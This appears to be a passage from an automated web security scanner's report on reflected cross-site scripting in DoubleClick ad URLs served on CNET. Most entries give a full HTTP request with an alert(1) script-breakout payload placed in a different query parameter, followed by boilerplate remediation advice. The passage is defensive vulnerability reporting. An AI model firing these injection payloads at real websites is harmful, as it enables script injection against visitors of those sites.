Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=e6dcf"-alert(1)-"da186d797f1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCF ...[SNIP]... &pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=e6dcf"-alert(1)-"da186d797f1http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094146_240279859_41826606"); var wmode = "opaque"; var bg = "same as SWF"; var dca ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5d30"-alert(1)-"735cad3f9ff was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cna5d30"-alert(1)-"735cad3f9ff&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71ac5"-alert(1)-"60210ebd303 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US71ac5"-alert(1)-"60210ebd303&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1bd8"-alert(1)-"fa4ab8635f9 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1c1bd8"-alert(1)-"fa4ab8635f9&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6eae"-alert(1)-"f4709710453 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253ad6eae"-alert(1)-"f4709710453&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f42e2"-alert(1)-"a460389f3fc was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=f42e2"-alert(1)-"a460389f3fc&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843fc"-alert(1)-"1a58586a840 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com843fc"-alert(1)-"1a58586a840&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89836"-alert(1)-"f10761b3dbf was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=289836"-alert(1)-"f10761b3dbf&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9081e"-alert(1)-"4fbee5b54b9 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com9081e"-alert(1)-"4fbee5b54b9&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dbfe"-alert(1)-"45f9826e8c3 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@1dbfe"-alert(1)-"45f9826e8c3&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fde4c"-alert(1)-"bdb9a49c390 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=fde4c"-alert(1)-"bdb9a49c390&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5da6b"-alert(1)-"f9a15ac6d12 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=1005da6b"-alert(1)-"f9a15ac6d12&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd6a"-alert(1)-"3d131037658 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=dfd6a"-alert(1)-"3d131037658&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 131f2"-alert(1)-"77497b5cb61 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000131f2"-alert(1)-"77497b5cb61&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9436b"-alert(1)-"3e60fe5490d was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.2439436b"-alert(1)-"3e60fe5490d&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bebad"-alert(1)-"78e78d75f6e was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6bebad"-alert(1)-"78e78d75f6e&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a32f"-alert(1)-"8ab85cbf533 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
